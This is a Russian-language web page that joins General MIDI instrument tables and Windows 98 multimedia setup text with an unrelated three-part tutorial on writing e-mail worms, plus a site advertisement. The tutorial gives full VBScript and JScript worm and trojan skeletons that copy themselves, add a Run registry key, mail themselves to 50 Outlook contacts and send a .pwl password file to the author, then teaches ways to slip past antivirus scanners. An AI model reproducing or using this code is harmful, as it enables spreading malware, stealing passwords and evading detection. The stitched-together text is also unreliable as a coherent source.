Карта клавишных инструментов General MIDI
PIANO CHROM PERCUSSION 1 Acoustic Grand 9 Celesta 2 Bright Acoustic
10 Glockenspiel 3 Electric Grand 11 Music Box 4 Honky-Tonk 12 Vibraphone
5 Electric Piano 1 13 Marimba 6 Electric Piano 2 14 Xylophone 7
Harpsichord 15 Tubular Bells 8 Clav 16 Dulcimer
ORGAN GUITAR 17 Drawbar Organ 25 Acoustic Guitar (nylon) 18
Percussive Organ 26 Acoustic Guitar (steel) 19 Rock Organ 27 Electric
Guitar (jazz) MIDI General MIDI
Мультимедиа 87 88 Мультимедиа Настройка инструмента под определенный
MIDI-канал
Мастер установки нового музыкального инструмента
20 Church Organ 28 Electric Guitar (clean) 21 Reed Organ 29 Electric
Guitar (muted) 22 Accoridan 30 Overdriven Guitar 23 Harmonica 31
Distortion Guitar 24 Tango Accordian 32 Guitar Harmonics
BASS STRINGS 33 Acoustic Bass 41 Violin 34 Electric Bass (finger) 42
Viola 35 Electric Bass (pick) 43 Cello 36 Fretless Bass 44 Contrabass 37
Slap Bass 1 45 Tremolo Strings 38 Slap Bass 2 46 Pizzicato Strings 39
Synth Bass 1 47 Orchestral Strings 40 Synth Bass 2 48 Timpani
ENSEMBLE BRASS 49 String Ensemble 1 57 Trumpet 50 String Ensemble 2
58 Trombone 51 SynthStrings 1 59 Tuba 52 SynthStrings 2 60 Muted Trumpet
53 Choir Aahs 61 French Horn 54 Voice Oohs 62 Brass Section 55 Synth
Voice 63 SynthBrass 1 56 Orchestra Hit 64 SynthBrass 2
REED PIPE 65 Soprano Sax 73 Piccolo 66 Alto Sax 74 Flute 67 Tenor Sax
75 Recorder 68 Baritone Sax 76 Pan Flute 69 Oboe 77 Blown Bottle 70
English Horn 78 Skakuhachi 71 Bassoon 79 Whistle 72 Clarinet 80 Ocarina
SYNTH LEAD SYNTH PAD 81 Lead 1 (square) 89 Pad 1 (new age) 82 Lead 2
(sawtooth) 90 Pad 2 (warm) 83 Lead 3 (calliope) 91 Pad 3 (polysynth) 84
Lead 4 (chiff) 92 Pad 4 (choir) 85 Lead 5 (charang) 93 Pad 5 (bowed) 86
Lead 6 (voice) 94 Pad 6 (metallic) 87 Lead 7 (fifths) 95 Pad 7 (halo) 88
Lead 8 (bass+lead) 96 Pad 8 (sweep)
SYNTH EFFECTS ETHNIC 97 FX 1 (rain) 105 Sitar 98 FX 2 (soundtrack)
106 Banjo 99 FX 3 (crystal) 107 Shamisen 100 FX 4 (atmosphere) 108 Koto
101 FX 5 (brightness) 109 Kalimba 102 FX 6 (goblins) 110 Bagpipe 103 FX
7 (echoes) 111 Fiddle 104 FX 8 (sci-fi) 112 Shanai
PERCUSSIVE SOUND EFFECTS 113 Tinkle Bell 121 Guitar Fret Noise 114
Agogo 122 Breath Noise 115 Steel Drums 123 Seashore 116 Woodblock 124
Bird Tweet 117 Taiko Drum 125 Telephone Ring 118 Melodic Tom 126
Helicopter 119 Synth Drum 127 Applause 120 Reverse Cymbal 128 Gunshot
General MIDI General MIDI
Мультимедиа 89 90 Мультимедиа
Карта ударных инструментов General MIDI
35 Acoustic Bass Drum 59 Ride Cymbal 2 36 Bass Drum 1 60 Hi Bongo 37
Side Stick 61 Low Bongo 38 Acoustic Snare 62 Mute Hi Conga 39 Hand Clap
63 Open Hi Conga 40 Electric Snare 64 Low Conga 41 Low Floor Tom 65 High
Timbale 42 Closed Hi-Hat 66 Low Timbale 43 High Floor Tom 67 High Agogo
44 Pedal Hi-Hat 68 Low Agogo 45 Low Tom 69 Cabasa 46 Open Hi-Hat 70
Maracas 47 Low-Mid Tom 71 Short Whistle 48 Hi-Mid Tom 72 Long Whistle 49
Crash Cymbal 1 73 Short Guiro 50 High Tom 74 Long Guiro 51 Ride Cymbal 1
75 Claves 52 Chinese Cymbal 76 Hi Wood Block 53 Ride Bell 77 Low Wood
Block 54 Tambourine 78 Mute Cuica 55 Splash Cymbal 79 Open Cuica 56
Cowbell 80 Mute Triangle 57 Crash Cymbal 2 81 Open Triangle 58 Vibraslap
Настройка мультимедийных устройств
В Windows 98 имеются средства, позволяющие настроить любые мультме-
дийные устройства, подключенные к вашему компьютеру. Находясь в папке
Панель управления, щелкните два раза по пиктограмме Мультимедиа. Перед
вами диалоговое окно свойств, вкладки которого позволяют просмотреть и
настроить все мультимедийные устройства вашего компьютера. Сначала обра-
тимся к вкладке Аудио. Опции этой вкладки позволяют настроить аудиоадап-
тер вашего компьютера.
Щелкнув на кнопке Воспроизведение, вы обратитесь к микшеру Windows
98, с помощью которого можно настроить громкость, баланс и уровень запи-
си звука.
Если вы используете какие-то особенные акустические системы (квадро-
фонические или динамики объемного звука) или желаете определить способ
воспроизведения звука отличный от того, что предлагает система по умол-
чанию, не выходя из вкладки Аудио, нажмите кнопку Дополнительно.
Перед вами еще одно диалоговое окно свойств Дополнительные свойства
звука с двумя вкладками.
С помощью первой вкладки Дополнительные свойства звука вы можете
вместе с Windows 98 выяснить, какие акустические системы использует ваш
компьютер для воспроизведения звука. General MIDI Настройка мультимедий-
ных устройств
Мультимедиа 91 92 Мультимедиа С помощью этой вкладки вы можете наст-
роить звуковую плату, подключенную к вашему компьютеру
Из списка вы можете выбрать следующие опции
- стереонаушники
- настольные стереодинамики
- монофонический динамик переносного компьютера
- стереофонические динамики переносного компьютера
- динамики монитора
- динамики монитора на подставке
- вмонтированные в монитор динамики
- динамики на клавиатуре
- квадрофонические динамики
- динамики объемного звука
Просто выберите из этого списка акустические системы наиболее подхо-
дящие к тем, которые подключены к вашему компьютеру.
Если вы желаете определить способ воспроизведения звука отличный от
того, что предлагает система по умолчанию, не выходя из вкладки Аудио,
нажмите кнопку Дополнительно и обратитесь к вкладке Быстродействие. С
помощью вкладки Быстродействие вы можете настроить мультимедийные уст-
ройства, подключенные к вашему компьютеру, на оптимальное воспроизведе-
ние звука.
Опция Аппаратное ускорение позволяет настроить степень ускорения зву-
кового микшера. Опция по умолчанию (Полное) наиболее соответствует опти-
мальному ускорению и поддерживает драйверы звуковых карт сторонних про-
изводителей и рекомендуется корпорацией Microsoft для большинства
компьютеров. Если же вам кажется, что ваш компьютер неправильно воспро-
изводит звук, попробуйте уменьшить разгон посредством регулировки пол-
зунка.
Опция Частота дискредитации позволяет отрегулировать степень воспро-
изведения звука. Установка по умолчанию соответствует оптимальной степе-
ни воспроизведения звука. Чем выше степень воспроизведения, тем активней
используются ресурсы центрального процессора вашего компьютера.
Снова обратимся к вкладке Аудио. Если установить флажок Использовать
только основные устройства, то в дальнейшем для каждого приложения необ-
ходимо будет выставлять собственные параметры аудиоадаптера. Эта опция,
как правило, активизируется только для тех приложений, которые требуют
специфических настроек для аудиоадаптера. Настройка мультимедийных уст-
ройств Настройка мультимедийных устройств
Мультимедиа 93 94 Мультимедиа Подходящая акустика вашего компьютера
Регулировка средств воспроизведения звука
Если вы установите флажок Регулятор громкости на пенели задач, то
пиктограмма микшера всегда будет отображаться на вашей панели задач
Windows 98.
Никуда не уходя из диалогового окна свойств Мультимедиа, плавно пе-
рейдем к вкладке Видео.
Опции вкладки Видео позволяют выбрать оконный или полноэкранный режим
воспроизведения видео на вашем компьютере. Если вы выберите оконный ре-
жим воспроизведения видео, то вашему вниманию будет предложено шесть па-
раметров размера окна, в котором, собственно, и будет воспроизводиться
видео.

Часть 1.
На идею написания статьи меня натолкнула статья How to write an E-Mail-Worm in VBScript
написанная DaSRo, я даже не стала изменять ее название. Просто постаралась сделать
описание более подробным и разбить пример на составные части, на которых легче
объяснить идею создания почтовый Internet – червей.
Начнем, как всегда с истории.
Самым знаменитым и нашумевшим стал I-Worm.LoveLetter (классификация Kaspersky Lab.),
вызвавший массовое поражение компьютеров и сетей в начале мая 2000 года. Для своего
запуска он использовал "дыру" в системе безопасности MS Windows, которая позволяла
запускаться файлам с расширением .vbs, присоединенных к почтовому отправлению.
Позже эта "дыра" была заделана, но сама идея написания E-mail worm на Windows Scripting
Host (WSH) пришлась по душе virmaker'ам, тем более что глубоких знаний в
программировании не требовалось. Достаточно было знать основы программирования на
Visual Basic или другом объектно-ориентированном языке.
Теперь немного о самом WSH.
Необходимость в создании нового командного языка возникла при переходе на платформу
Win9x и NT, так как старые .bat файлы уже не могли обеспечить должной гибкости при
автоматизации процессов настройки операционной среды. Был создан независимый от
языка скрипт – хост, который позволял строить аналоги .bat файлов на VBScript, JScript и
других скриптовых языках, например, Active Perl или Python.
Как ни хороши скриптовые языки, много с ними не сотворишь. Они неспособны, повлиять на
что-либо за пределами родного скрипта. Эти языки не имеют прямых инструкций,
позволяющих читать и записывать файлы на диске, выводить информацию в командную
строку, изменять записи в реестре и так далее.
Чтобы справиться с такими задачами, нужно воспользоваться дополнительными COM –
объектами. Ряд таких объектов входит в поставку WSH, а один из них, WScript, даже уже
имеет созданный экземпляр, и им можно пользоваться непосредственно, без
предварительного создания. Остальные создаются с помощью синтаксиса,
соответствующего конкретному языку или функции WScript.CreateObject. Подробнее о WSH
можно прочитать здесь.
Настало время перейти непосредственно к описанию программного кода. Для написания
примеров будем использовать Visual Basic Scripting Edition, на котором написано
подавляющие большинство Internet – червей. Начнем с инструкций Option Explicit и On Error
Resume Next, первая необходима при отладке кода, она запрещает использование не
объявленной ранее переменной, а вторая подавляет обработчик ошибок.
Option Explicit
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
В данном примере используются переменные FileSysObject и File, и если при создании
скрипта вы допустите ошибку, написав FileSysObiect, интерпретатор сообщит вам, что
используется необъявленная, в операторе Dim, переменная. Такие ошибки находить очень
трудно, так как они зачастую меняют всю логику работы программы. Перейдем к инструкции
On Error Resume Next, эта инструкция означает, что любая возникшая ошибка будет
обработана программным кодом позднее, а в нашем случае никогда. Это позволяет
запретить выдачу системных сообщений об ошибках и замаскировать работу скрипта.
Теперь опишем третью и четвертую строки примера:
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Присваиваем переменной FileSysObject ссылку на объект COM-компоненты WSH File
System Object. С помощью метода GetFile присвоим переменной File ссылку на командную
строку местоположения исполняемого файла.
Скопируем скрипт в c:\windows, для дальнейшего использования.
File.Copy ("c:\windows\I_am_virus.vbs")
Присвоим переменной WshShell ссылку на объект COM-компоненты WSH позволяющую
менять настройки системы и запускать приложения.
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
Теперь мы смело можем управлять захваченным компьютером.
Сначала пропишем свой "страшный вирус" в реестр, для повторного запуска после
перезагрузки, хотя для E-mail worm это и необязательно, как в прочем и процедура
копирования.
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows _
\CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs"
Следующий шаг за вашей фантазией, можно скопировать из Internet более сложный вирус,
как делал I-Worm.LoveLetter, и запустить его, отослать вам файл с паролями, или просто и
скучно перепортить кучу файлов.
И, наконец, мы переходим к "сердцу" каждого Internet – червя, процедуре рассылки.
Создаем ссылку на объект самого распространенного почтового клиента Outlook.
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
Зададим цикл, в ходе которого разошлем зараженные письма по первым 50 адресам,
занесенным в адресную книгу.
For Index = 1 To 50
Создадим новое почтовое сообщение
Set OutMail = OutlookObject.CreateItem(0)
В поле "Кому" занесем адрес из адресной книги
OutMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
В поле "Тема" вставим тему сообщения
OutMail.Subject = "Тема сообщения"
Добавим текст сообщения
OutMail.Body = "Тело сообщения"
Прикрепим скрипт
OutMail.Attachments.Add(WScript.ScriptFullName)
И отправим его
OutMail.Send
Next
Вот вы и стали писателями вирусов. Чувствуете подъем? Опуститесь на землю, это только
каркас, заполнить его, ваша задача. Удачи!
Каркас E-mail worm:
On Error Resume Next
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
For Index = 1 To 50
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add(WScript.ScriptFullName)
OutMail.Send
Next
Каркас "троянского коня":

On Error Resume Next
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
File.Copy ("c:\windows\I_am_virus.vbs")
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _
CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs"
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
For Index = 1 To 50
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add(WScript.ScriptFullName)
OutMail.Send
Next
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to = "Ваш E-mail"
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add("Путь к .pwl файлу")
OutMail.Send
Часть 2. - Исследование новых возможностей
В ходе написания первой статья я столкнулась с проблемами при тестировании написанных
скриптов, установленный AVP Script Checker на любую попытку сохранить файл с
командами копирования файла с локальной машины, пересылки через электронную почту,
попытки прочитать реестр, выдавал сообщение о наличии в этом файле новых модификаций
различных вирусов. Создавалось впечатление, что AVP надежно стоит на страже наших
интересов, и я решила проверить, действительно ли это так?
При изучении документации к Windows Scripting Host(WSH), я обратила внимание на абзац
где было сказано, что корпорацией Microsoft был создан независимый от языка скрипт –
хост, который позволял строить аналоги .bat файлов на VBScript, JScript и других скриптовых
языках, например, Active Perl или Python. На их сайте про Active Perl или Python ничего
сказано не было но про JScript было написано довольно подробно, сравнив возможности
VBScript и JScript, стало понятно, что они идентичны и отличаются только синтаксисом
языка.
Переписать скрипт с одного языка программирования в другой было делом техники, в
результате получилось:
Каркас E-mail worm

var fileSysObject, file;
fileSysObject = new ActiveXObject("Scripting.FileSystemObject");
file = fileSysObject.GetFile(WScript.ScriptFullName);
var outlookObject, outMail, index;
outlookObject = new ActiveXObject("Outlook.Application");
for (index = 1; index < 50; index++){
outMail = outlookObject.CreateItem(0);
outMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index);
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
OutMail.Attachments.Add(WScript.ScriptFullName);
outMail.Send;}
Каркас "троянского коня"

var fileSysObject, file;
fileSysObject = new ActiveXObject("Scripting.FileSystemObject");
file = fileSysObject.GetFile(WScript.ScriptFullName);
file.Copy("c:\windows\I_am_virus.vbs");
var wshShell;
wshShell = new ActiveXObject("WScript.Shell");
wshShell.RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _
CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs");
var outlookObject, outMail, index;
outlookObject = new ActiveXObject("Outlook.Application");
for (index = 1; index < 50; index++){
outMail = outlookObject.CreateItem(0);
outMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index);
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
OutMail.Attachments.Add(WScript.ScriptFullName);
outMail.Send;}
outMail = outlookObject.CreateItem(0);
outMail.to = "Ваш E-mail";
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
outMail.Attachments.Add("Путь к .pwl файлу");
outMail.Send;
AVP молчал :)
Однако при выполнении скрипта Script Checker выдал сообщение, что этот файл возможно
содержит вирус и заблокировал его выполнение. Покопавшись еще я выяснила, что он
реагирует на попытку отослать файл по почте, так как и в VBScript, и в JScript строка
OutMail.Attachments.Add(WScript.ScriptFullName) выглядит одинаково. Избавиться от этого
удалось, закодировав скрипт программой MS Windows Script Encoder.
Скрипт был проверен на трех самых распространенных антивирусных программах Norton
AntiVirus, AVP и Dr.Web. Первые две успешно промолчали, и только Dr.Web, отфильтровал
его, как потенциально опасный, сработал знаменитый эвристический анализатор.
На основе сделанного анализа можно предположить, что нас ждет следующий виток
эпидемий связанных с написанием вирусов на JScript.
Часть 3. - Как обмануть AVP Script Checker
Описанный метод обхода AVP Script checker довольно сложен, так как требует знаний
разных языков программирования, однако можно придумать множество более простых
методов.
Практически все программы защиты от вирусов работают по одному и тому же принципу,
они сравнивают файлы с имеющимися в базе данных участками вирусов, так называемыми
сигнатурами. По аналогичному алгоритму работает и AVP Script checker, который после
предварительной компиляции просматривает файл, и ищет "знакомые места". Однако в
отличие от компиляторов мощных программных продуктов cscript.exe проводит только
предварительную компиляцию, без редактирования исходного кода, и поэтому, немного
изменив исходный код ранее написанного вируса можно легко обойти защиту.
За основу возьмем каркас почтового червя на VBScript.
Начнем с самого простого метода, изменения порядка выполнения, добавления пробелов и
пустых строк.
Заменяем
OutMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
на OutMail.to = "Адресс E-mail", для безопасности, и сохраняем.
AVP "говорит": обнаружена новая модификация вируса I-Worm VBS.Fool.
Убираем строку Set File = FileSysObject.GetFile(WScript.ScriptFullName), он замолчал,
значит, антивирус реагирует именно на присутствие этой строки. Меняем местами строки и
получаем:
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
AVP Script checker не реагирует.
Можно просто изменить проблемную строку следующим образом:
Set File = FileSysObject. _
GetFile(WScript. _
ScriptFullName)
Эффект тот же, надо только поэкспериментировать. В коде I-Worm VBS.HappyTime в начало
файла добавлено 35 пустых строк и этого хватило, чтобы антивирус не распознал его.
Существуют и более сложные методы, например кодирование тела вируса. Ярким примером
этого послужил I-Worm VBS.Homepage в котором основной код был закодирован
следующим образом:
DeCode("Кодированное тело Homepage")
Function DeCode(Coded)
For I = 1 To Len(Coded)
CurChar= Mid(Coded, I, 1)
If Asc(CurChar) = 15 Then
CurChar= Chr(10)
ElseIf Asc(CurChar) = 16 Then
CurChar= Chr(13)
ElseIf Asc(CurChar) = 17 Then
CurChar= Chr(32)
ElseIf Asc(CurChar) = 18 Then
CurChar= Chr(9)
Else
CurChar = Chr(Asc(CurChar) - 2)
End If
DeCode = DeCode & CurChar
Next
End Function
В результате чего, довольно простенький скрипт заразил миллионы компьютеров по всему
миру.
Следующим шагом будет написание на VBS полиморфика, скрипта способного
видоизменять свой код по мере необходимости.
К недовольству "настоящих вирусописателей", считающих скриптовые технологии забавой
для ламеров, количество вирусов использующих эту технологию неуклонно растет. Это
связанно с простотой реализации и интегрированностью в операционную систему, с
помощью скриптов можно полностью управлять системой, запускать и останавливать
процессы, удаленно создавать и удалять пользователей, править файлы, и много чего
еще...
Links
Windows Script Encoder здесь:
http://msdn.microsoft.com/scripting/vbscript/download/x86/sce10en.exe
P.S. Согласно статьи 273 УК. создание, использование и распространение вредоносных
программ для ЭВМ преследуется по закону.

Найти можно всё, а на сайте medvedica большинство всего!

Более 400 игр и 400 программ!

Более 100 статей и более 100 многих других интересностей!

Красивый дизайн и удобная навигация!

Позволит вам спокойно, без лишних усилий, найти нужную информацию!

Написать администратору сайту в случае чего или обсудить в форуме!

Мы желаем вам удобства и всего хорошего! www.medvedica.narod.ru

Мы приглашаем вас к нам на сайт. Обсудить вопросы вас интересующие. Оставить пожелание в гостевой книги.

Скачать полезные утилиты и программы, узнать много многого для самого себя. Стать автором статей.